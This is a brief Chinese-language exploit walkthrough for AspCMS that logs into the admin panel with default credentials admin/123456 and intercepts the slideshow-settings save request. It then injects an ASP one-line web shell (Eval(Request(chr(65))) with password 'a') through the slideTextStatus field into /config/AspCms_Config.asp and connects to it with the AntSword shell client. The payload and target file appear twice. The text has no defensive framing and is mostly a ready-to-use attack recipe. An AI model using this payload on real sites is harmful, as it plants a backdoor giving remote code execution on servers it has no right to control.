1.【ip】/admin_aspcms/login.asp访问后台,admin 123456 登录
2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包
3.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件
字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a
影响文件
/config/AspCms_Config.asp
4.蚁剑连接
字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a
影响文件
/config/AspCms_Config.asp